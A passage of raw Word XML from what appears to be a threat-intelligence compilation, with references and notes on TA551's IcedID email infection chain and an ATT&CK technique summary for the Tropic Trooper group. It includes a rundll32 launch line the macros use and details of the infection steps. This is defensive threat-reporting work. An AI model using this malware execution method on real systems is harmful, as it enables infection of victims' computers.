            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5884EB5A" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="0077286F" w:rsidRDefault="007074DF" w:rsidP="007074DF"/>
    <w:p w14:paraId="7E45AFD6" w14:textId="184F45B9" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidR="00B37631">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">TA551: Email Attack Campaign Switches from </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B37631">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Valak</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B37631">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> to </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B37631">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>IcedID</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B37631">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (paloaltonetworks.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r w:rsidR="00B37631">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34328331" w14:textId="241CD36C" w:rsidR="00CE00AC" w:rsidRDefault="00CE00AC" w:rsidP="007074DF">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>iocs</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/TA551 at master · pan-unit42/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>iocs</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> · GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020] (indicators of compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7964D" w14:textId="63C7B2E7" w:rsidR="00CE00AC" w:rsidRDefault="00CE00AC" w:rsidP="007074DF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">TA551, GOLD CABIN, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Shathak</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Group G0127 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F273742" w14:textId="0E938647" w:rsidR="00E200F3" w:rsidRDefault="00E200F3" w:rsidP="007074DF">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">GOLD CABIN | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Secureworks</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C92FFE0" w14:textId="7D2307F9" w:rsidR="00CF725C" w:rsidRDefault="00CF725C" w:rsidP="007074DF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>TA551 distributes new ICEDID malware (trendmicro.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (Google “</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF725C">
        <w:t xml:space="preserve">TA551 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF725C">
        <w:t>icedid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF725C">
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B213228" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00362F25"/>
    <w:p w14:paraId="16954947" w14:textId="77777777" w:rsidR="00CE00AC" w:rsidRPr="00CE00AC" w:rsidRDefault="00CE00AC" w:rsidP="00CE00AC">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE00AC">
        <w:t>From mid-July through November 2020, TA551 has remained consistent in its infection process. A flow chart for the chain of events is shown in Figure 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FBB30" w14:textId="11D2C002" w:rsidR="00AC7A22" w:rsidRDefault="00AC7A22" w:rsidP="00362F25"/>
    <w:p w14:paraId="6C544828" w14:textId="77777777" w:rsidR="002E42B2" w:rsidRDefault="002E42B2"/>
    <w:p w14:paraId="0E1FDDE7" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AB2DC0">
      <w:r>
        <w:t>[1] The initial lure is an email spoofing an email chain. These email chains are retrieved from email clients on previously infected hosts. The message has an attached ZIP archive and a message informing the user of a password necessary to open the attachment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790A1BC" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AB2DC0"/>
    <w:p w14:paraId="3D416C68" w14:textId="26128BCC" w:rsidR="00E200F3" w:rsidRDefault="00AB2DC0" w:rsidP="00AB2DC0">
      <w:r>
        <w:t xml:space="preserve">After opening the ZIP archive, the victim finds a Microsoft Word document with macros. If the victim enables macros on a vulnerable Windows computer, the victim’s host retrieves an installer DLL for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware. This will infect a vulnerable Windows computer. See F</w:t>
      </w:r>
      <w:r w:rsidR="009E21DE">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gures 2-7 for a recent example targeting a Japanese-speaking victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C80BD" w14:textId="77777777" w:rsidR="00E200F3" w:rsidRDefault="00E200F3" w:rsidP="00E200F3">
      <w:r>
        <w:t xml:space="preserve">[1] Since November 2020, we have also noticed minor changes in artifacts generated during </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> infections, including those outside of the TA551 campaign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893AB74" w14:textId="77777777" w:rsidR="00E200F3" w:rsidRDefault="00E200F3" w:rsidP="00E200F3"/>
    <w:p w14:paraId="467ABC49" w14:textId="77777777" w:rsidR="00CF725C" w:rsidRDefault="00E200F3" w:rsidP="00E200F3">
      <w:r>
        <w:t xml:space="preserve">For example, through early November 2020, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DLLs created by installer DLLs were initially saved to the victim’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Local\Temp directory, and the file name started with a tilde (~) and ended with .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as illustrated earlier in Figure 6. In November 2020, we started to see a change: the initial </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DLLs saved to the victim’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Local directory with a file name ending in .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as shown in Figure 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E880C0F" w14:textId="77777777" w:rsidR="00082BE8" w:rsidRDefault="00CF725C" w:rsidP="00E200F3">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF725C">
        <w:t>It will download the ICEDID loader as a DLL file with a different extension such as .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF725C">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF725C">
        <w:t xml:space="preserve"> or .pdf. It connects to the C&amp;C server to download a PNG file that contains encrypted data of the ICEDID malware. The loader will decrypt the data and inject the malware in an instance of svchost.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0FBD9" w14:textId="77777777" w:rsidR="00082BE8" w:rsidRDefault="00082BE8" w:rsidP="00E200F3"/>
    <w:p w14:paraId="4527D78F" w14:textId="77777777" w:rsidR="00FA3A2F" w:rsidRDefault="00082BE8" w:rsidP="00E200F3">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00082BE8">
        <w:t>New method: rundll32.exe [installer DLL filename</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00082BE8">
        <w:t>],</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082BE8">
        <w:t>ShowDialogA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00082BE8">
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:r w:rsidR="00F40617">
        <w:t xml:space="preserve"> (this is the run method used by the malicious macros)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9637C8" w14:textId="77777777" w:rsidR="00FA3A2F" w:rsidRDefault="00FA3A2F" w:rsidP="00E200F3"/>
    <w:p w14:paraId="2D058E23" w14:textId="5D1CB689" w:rsidR="002E42B2" w:rsidRDefault="002E42B2" w:rsidP="00E200F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2968B23A" w14:textId="6D4DD3BA" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00324B94">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc153480905"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tropic Trooper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="308A3223" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="005B4630" w:rsidRDefault="00324B94" w:rsidP="00324B94">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc153480906"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="5541E5E2" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="007E02B4" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0081 - Tropic Trooper is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D050A" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="007E02B4" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is China</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605726B9" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="007E02B4" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A757C19"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58268C58"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2EDD3"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1078.003', 'T1091', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA9A08"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048411B5"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7F656"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FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA23A2E"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.003', 'T1106', 'T1204.002', 'T1203']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EB0A2"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAF9FD"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1106 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Native API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C852F29" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="00FE5935" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6EFFFB" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="00FE5935" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EE99F"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1078.003', 'T1505.003', 'T1547.001', 'T1543.003', 'T1574.002', 'T1547.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69353D65"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A813438"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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD0ABC" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="00B22303" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B22303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B22303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B22303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B22303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34517F3A"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
